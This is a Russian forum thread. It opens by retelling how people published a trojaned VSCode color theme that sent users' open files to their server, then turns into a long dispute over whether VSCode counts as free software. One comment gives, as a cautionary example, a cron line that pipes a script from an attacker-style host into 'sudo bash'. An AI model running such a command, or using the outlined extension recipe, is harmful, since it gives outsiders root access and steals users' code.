LINUX.ORG.RU
ФорумTalks

ALL YOUR (VS)CODES ARE BELONG TO US

 , , ,


1

3

Привет, ЛОР!

Занимательное чтиво попалось мне. А именно, история о том, как, оказывается, можно без проблем загрузить в магазин дополнений к VSCode троянского коня и через полчаса тебе посыпится профит. Итак:

  1. Берём популярную цветовую тему.
  2. Меняем слегка название, пару цветов, рисуем логотип, добавляем вредоносный код. В данном случае, код просто отправляет содержимое открытого файла на наш сервер.
  3. Покупаем домен с названием нашей темы, настраиваем его и т.д.
  4. Заливаем тему в магазин приложений VSCode. Домена достаточно, чтобы наша тема получила официальную зелёную галочку рядом с именем. В package.json мы при этом можем указать ссылку на любой репозитарий на гитхабе, никто это не проверяет. Поэтому указываем репозитарий без зловреда.
  5. Ждём.
  6. ???????????
  7. PROFIT!!!11

Некие чуваки вот так всё сделали и уже на следующее утро их вредоносная тема была установлена сотней с лишним аболтусов, засветилась на главной странице с дополнениями к VSCode, а им самим стал прилетать в том числе проприетарный код из всяких крупных копрораций.

Мораль истории: ну ты понел.

Ссылка для !Ъ: https://medium.com/@amitassaraf/the-story-of-extensiontotal-how-we-hacked-the-vscode-marketplace-5c6e66a0e9d7

★★★★★

Последнее исправление: hateyoufeel (всего исправлений: 3)
Ответ на: комментарий от cumvillain

«полумух» погоняло для OS/2 ака «полуось». Родилось от анекдота:
- Гоги, а кто такой ос?
- Это такой большой полосатый мух.

anc ★★★★★
()
Последнее исправление: anc (всего исправлений: 1)
Ответ на: комментарий от hateyoufeel

У авторов нет контроля над тем, что попадает в ELPA/MELPA, эти каталоги дёргают код из гита и сами дальше распространяют

Совсем не факт, что там кто-то сидит и тщательно всё отсматривает. Тем более бесплатно.

no-such-file ★★★★★
()
Ответ на: комментарий от no-such-file

Да-да. А если человеческий мозг – машина Тьюринга, то задача поиска бэкдоров сводится к Проблеме Останова, которая, как известно каждому ЛОРовцу с чёрно-синей темой (все остальные – сраные позеры!), не разрешима.

Тем не менее, премодерация сильно повышает шансы, что бэкдор не пройдёт.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

премодерация сильно повышает шансы, что бэкдор не пройдёт

Если она реально есть, а не на отвали. И кто конкретно этим занимается? Имена, фамилии? Можно как-то узнать, кто просмотрел и одобрил определённую версию некоторого пакета?

no-such-file ★★★★★
()
Ответ на: комментарий от no-such-file

Да, можно. В гит логе мельпы, например.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

Бывает что разработка проходит за закрытыми дверями и продукт хоть и вываливают под открытой лицензией, но патчи от пользователей либо не принимают вовсе, либо принимают выборочно с отказом от прав на код патча. Тоже степень свободы. Хотя с точки зрения пользователя такой продукт, конечно, тоже свободный. Хотя так углубляться в отношении к обсуждаемому в теме продукту нет необходимости. Он самая обычная проприетарщина, что отражено во всех местах. Так что на этом и надо было ограничиваться. Чёт я вчера тригернулся понапрасну на тролля и его заявления про свободность этого блокнота и хорошую репутацию его хозяев.

andalevor ★★★
()
Ответ на: комментарий от andalevor

Бывает что разработка проходит за закрытыми дверями и продукт хоть и вываливают под открытой лицензией, но патчи от пользователей либо не принимают вовсе, либо принимают выборочно

Ты щас linux kernel описал, один в один. Или glibc. Или openssh. Короче, почти все core компоненты твоей свободной ос.

cumvillain
()
Ответ на: комментарий от andalevor

Кто тролль ты тролль епта. Мазал тут сопли про несвободную свободу софта с понтом ты учииитель, ты заставляешь напрягать извииилины, а потом обнаружил себя в луже и ноешь сидишь.

thesis ★★★★★
()
Ответ на: комментарий от andalevor

Погоди. То есть, если я выкладываю код своей софтины на жидхаб под впопенсурцной лицензией вплоть до GPL, но при это шлю людей нах с их патчами и идеями, потому что они мне ну вообще не упёрлись, то это проприетарщина? А как насчёт софта, авторы которого давно померли и гниют в земле и код никем не развивается? Тоже проприетарщина?

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

Труприетарщина. Ъ-приетарщина, идеально стабилизированный софт.

thesis ★★★★★
()
Ответ на: комментарий от anc

Так а драма-то где? Две корпорации не договорились и закрыли совместный проект. Бывает.

cumvillain
()
Ответ на: комментарий от hateyoufeel

А если ты сделал сайтик со своими дополнениями и никого туда не пускаешь, это тоже проприетарщина.

Короче, я понял. Он просто коммунист — если он не может отобрать и поделить, у него тут же жопа взрывается.

cumvillain
()
Ответ на: комментарий от andalevor

Читай что я написал ещё раз.

Я дважды прочитал. Выглядит как бред. Думаешь, на третий раз станет лучше?

Попробуй лучше вместо этих пространных тирад про свободность для одного пользователя выкатить чёткий список критериев, которым проект должен соответствовать.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от cumvillain

Ну, главное что блокнотик от мс свободен, а репутация у мс отличная.

andalevor ★★★
()
Ответ на: комментарий от hateyoufeel

Я написал, что открытый подход к разработке делает продукт более свободным через участие пользователей. Хочешь с этим спорить – вперёд.

andalevor ★★★
()
Ответ на: комментарий от andalevor

делает продукт более свободным

Что вот это значит? Есть какая-то градация свободности? Шкала из 100 баллов? Я не понимаю.

Код либо открыт и свободен для изменений, либо не свободен. Как и беременность, это вполне бинарное состояние, никаких суперпозиций не наблюдается.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от andalevor

Беременность и «свободность» ПО являются бинарными состояниями. Женщина либо беременна, либо нет. ПО либо свободно, либо нет. В обоих случаях не существуют каких-либо промежуточных состояний.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

Т.е. все открытые лицензии дают равные возможности и налагают равные ограничения? Или может всё же есть различия?

andalevor ★★★
()
Ответ на: комментарий от andalevor

А это не важно. ПО является свободным, если соблюдены следующие 4 требования:


    The freedom to run the program as you wish, for any purpose (freedom 0).
    The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this.
    The freedom to redistribute copies so you can help others (freedom 2).
    The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this.

Если они не соблюдены, ПО свободным не является. Лицензия – это просто механизм, и она может быть любой, пока 4 пункта выше соблюдены. На сайте бородатого так и написано: "A program is free software if it gives users adequately all of these freedoms. Otherwise, it is nonfree. "

hateyoufeel ★★★★★
() автор топика
Последнее исправление: hateyoufeel (всего исправлений: 1)
Ответ на: комментарий от hateyoufeel

Это просто определение, оно не расходится с тем что я тебе ответил ещё в далёком посте, при чём я явно это указал. Не знаю с чем ты споришь. Ну и это, мир чуть сложнее, чем чёрное и белое :)

andalevor ★★★
()
Ответ на: комментарий от andalevor

Это просто определение

Да.

Ну и это, мир чуть сложнее, чем чёрное и белое :)

Мир сложнее, определение свободности ПО – нет.

Не знаю с чем ты споришь.

С тобой и твоим утверждением, что VSCode не является свободным ПО. Потому что является.

hateyoufeel ★★★★★
() автор топика
Последнее исправление: hateyoufeel (всего исправлений: 1)
Ответ на: комментарий от cumvillain

воровали, по крайней мере видел скринкасты со своей винды в кабинете ФСБ, когда ещё жил в рашке (не зря же я русофобом стал), на которой весь софт был открытым, кроме самой винды (включая оконный менеджер и ФМ).

впрочем, распечатку своей гуглопочты я тоже видел там же. после этого пользуюсь исключительно лялексом, XMPP со сквозным шифрованием на собственных серверах, собственным интернет-провайдером (такие дела, модеры могут IP увидеть и пробить), ну и про шапочку из фольги не забываю.

инцидент имел место до крымнаша (2012-2013), когда «ваши мальчики» обменивались разведданными с пиндосскими спецслужбами.
бтв, не считаю пиндосов швитыми охранителями швабодки – такая же империалистическая параша, только вывернутая наизнанку. а вот Исландцы молодцы, думаю в скором времени перекатываться туда.

но кто же мне поверит, не так ли?

annerleen_temp
()
Ответ на: комментарий от annerleen_temp

но кто же мне поверит, не так ли?

Конечно. Как минимум, мы не знаем, как они эти фото получили. Может тебе троян закинули? Не говоря уже о том, что пруфов этой истории мы тоже не увидим.

cumvillain
()
Последнее исправление: cumvillain (всего исправлений: 1)
Ответ на: комментарий от cumvillain

пруфстер.жпг

Может тебе троян закинули?

наверняка, ага. через msupd.exe.

из пруфов было только административный штраф за прониконвение в чужой пк в пять тыщ рублей, но он за 10 с лихвуем лет уже сгнил и разложился.

annerleen_temp
()
Последнее исправление: annerleen_temp (всего исправлений: 1)
Ответ на: комментарий от annerleen_temp

Ну то же самое видевшие пришельцев говорят. Я вполне верю что история была, но без деталей и анализа как данные получены это ни о чем, увы.

cumvillain
()
Ответ на: комментарий от cumvillain

но без деталей

а кто мне их даст, лол? спецслужбы?
знаю только то, что расследование было инициировано американской стороной, к «вашим мальчикам» они пришли уже с вещдоками, лол.

как они это сделали, учитывая то, что левых .exe я не запускал, а всё ПО было открытым – у меня сомнений нет, как и в том, что даже в спермёрке актуальной на тот момент были бэкдоры, доступ к которым есть у всяких АНБ и ФБР.
впрочем, лялекс на десктопе и ноуте не мешает моей паранойе, кто ж будет проверять миллионы строк кода-то, ехехе.

annerleen_temp
()
Ответ на: комментарий от annerleen_temp

а кто мне их даст, лол? спецслужбы?

А это не претензия к тебе лично, это просто констатация того, что доказательств, которые можно хоть как-то рассмотреть, у нас нет. Можем посидеть потрындеть, но на имидж MS это не повлияет никак.

как они это сделали, учитывая то, что левых .exe я не запускал, а всё ПО было открытым – у меня сомнений нет, как и в том, что даже в спермёрке актуальной на тот момент были бэкдоры, доступ к которым есть у всяких АНБ и ФБР.

Или у тебя RDP был с паролем ChangeMe123. Мы не знаем :)

cumvillain
()
Последнее исправление: cumvillain (всего исправлений: 2)
Ответ на: комментарий от hateyoufeel

С тобой и твоим утверждением, что VSCode не является свободным ПО. Потому что является.

Да? А это что такое? Одна из лицензий списка OSI? https://code.visualstudio.com/license

Ну и прежде чем тут меня или кого-то ещё убеждать в свободности продукта vscode, сходи к мелкомягким и им это вотри, а то они не в курсе. Пишут у себя почему-то, что vscode ОСНОВАН на открытом коде, но включает пропритарные данные и фичи. https://code.visualstudio.com/Docs/supporting/FAQ

andalevor ★★★
()
Ответ на: комментарий от yu-boot

Думаю это никто не узнает достоверно. На установочном диске винды соответствующего кода скорее всего нет (хотя кто их знает), но подгрузить его с серверов мс в качестве обновления, сделать всё что нужно с компом и затем так же незаметно удалить труда для мс очевидно не представляет.

Поражает логика как у тебя: да вот, их ни разу на этом публично не спалили, значит они 100% честные. Представь, тебе какой-нить владелец сайта по торговле крадеными данными предлагает добавить в крон строчку «curl https://haxx.site/check.sh | sudo bash» и заявляет, что это для сбора анонимной статистики пользования компами. Ты согласишься?

firkax ★★★★★
()
Последнее исправление: firkax (всего исправлений: 1)
Ответ на: комментарий от andalevor

По твоему оперделению, Firefox тоже свободным ПО не является. Что ж поделать-то, если у тебя хлебушек в голове? Только насмехаться над тобой.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

Какие мои определения в контексте vscode? Тебя прямо моськой ткунули, что сами авторы не считают свой продукт свободным, а ты про про хлебушек в голове, да про firefox, который тут никаким боком.

andalevor ★★★
()
Последнее исправление: andalevor (всего исправлений: 1)
Ответ на: комментарий от andalevor

Какие мои определения в контексте vscode?

И правда, какие. Ведь ты не смог сформулировать критерии, по которым ПО может считаться свободным, а определение от Штальмана, по которому VSCode таки является свободным ПО, тебе не нравится.

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

И правда, какие. Ведь ты не смог сформулировать критерии, по которым ПО может считаться свободным

Мои критерии, твои критерии, чьи угодно критерии возьми. Но потом сходи по ссылке выше и попробуй эти критерии приложить.

This agreement only gives you some rights to use the software. Microsoft reserves all other rights.

Вот это подходит под критерии, что ты привел? Хватит шланговать. Есть ПРОДУКТ vscode и он проприетарный. И сами авторы не стесняются этого. Да, проприетарный продукт vscode основан на открытом коде. Но именно ОСНОВАН. Т.е. имеет другие компоненты не пот лицензией MIT (некоторые даже перечислены в лицезии). Хватит извиваться и перестань выставлять себя клоуном.

andalevor ★★★
()
Ответ на: комментарий от andalevor

Мои критерии, твои критерии, чьи угодно критерии возьми. Но потом сходи по ссылке выше и попробуй эти критерии приложить.

Взял критерии от GNU, приложил их к коду VSCode. Получилось, что VSCode – свободное ПО. Не благодари!

ПРОДУКТ

ОСНОВАН

ГЛАВНОЕ, ЭТО БОЛЬШЕ КАПСА ДЛЯ ВЫРАЗИТЕЛЬНОСТИ! А ИНАЧЕ НИЧЕГО НЕПОНЯТНО!

hateyoufeel ★★★★★
() автор топика
Последнее исправление: hateyoufeel (всего исправлений: 1)
Ответ на: комментарий от hateyoufeel

Капс затем чтобы акцентировать твоё внимание. Потому что я не хочу верить, что ты на столько туп, что не понимаешь смысл слов. Думал, может просто не замечаешь.

Давай попробуем ещё раз. Какое нахер дело пользователю продукта, что код, на котором этот продукт основан, открыт под свободной лицензией, если сам продукт выпускается под проприетарной? Ты серьёзно думаешь, что все пользователи vscode сами собирают редактор из репы на github, а не качают сборочку с сайта мелкомягких?

andalevor ★★★
()
Ответ на: комментарий от andalevor

Какое нахер дело пользователю продукта, что код, на котором этот продукт основан, открыт под свободной лицензией, если сам продукт выпускается под проприетарной?

Чтобы изучать, изменять и распространять изменённый код. Прямо как написано в манифесте GNU.

Ты серьёзно думаешь, что все пользователи Ubuntu сами собирают весь код из репы, а не качают сборочку с сайта шаттлврота?

Ты серьёзно думаешь, что все пользователи Firefox сами собирают весь код из репы, а не качают сборочку с сайта тормозилки?

Ты серьёзно думаешь, что все пользователи linux.org.ru сами собирают весь код из репы, а не открывают сайт в браузере?

ПРОПРИЕТАРЩИНА! ПРОПРИЕТАРЩИНА ПОВСЮДУ!!!!!!1111

hateyoufeel ★★★★★
() автор топика
Ответ на: комментарий от hateyoufeel

Чтобы изучать, изменять и распространять изменённый код. Прямо как написано в манифесте GNU.

Скинь мне ссылку на код с телеметрией. Хочу изучить.

ПРОПРИЕТАРЩИНА! ПРОПРИЕТАРЩИНА ПОВСЮДУ!!!!!!1111

В ubuntu входят компоненты под самыми разными лицензиями в том числе и проприетарь по типу дров невидии. Что касается firefox, то стоит открыть about и увидишь:

Binaries of this product have been made available to you by the Mozilla Project under the Mozilla Public License 2.0 (MPL).

Т.е. и бинари, и код под свободной лицензией, а в случае с вскод, бинарные сборки под проприетарной лицензией и включают код не под MIT. И это не я придумал, а сами мелкомягкие пишут у себя везде. Хорош уже выкручиваться.

andalevor ★★★
()
Закрыто добавление комментариев для недавно зарегистрированных пользователей (со score < 50)